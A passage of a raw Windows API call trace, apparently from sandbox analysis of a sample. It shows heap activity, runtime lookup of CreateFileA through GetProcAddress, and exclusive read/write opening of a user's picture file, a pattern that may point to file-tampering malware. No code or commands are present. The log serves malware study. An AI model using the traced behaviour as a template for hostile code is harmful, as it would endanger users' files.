[0190.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0190.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.286] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.288] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4f8 [0190.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.289] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0190.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd4f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.289] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0190.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0190.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4e) returned 0x923a78 [0190.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", cchWideChar=78, lpMultiByteStr=0x923a78, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpUsedDefaultChar=0x0) returned 78 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.290] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\x6gb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0190.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9c) returned 0x8f9100 [0190.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=78, lpWideCharStr=0x8f9100, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png") returned 78 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, 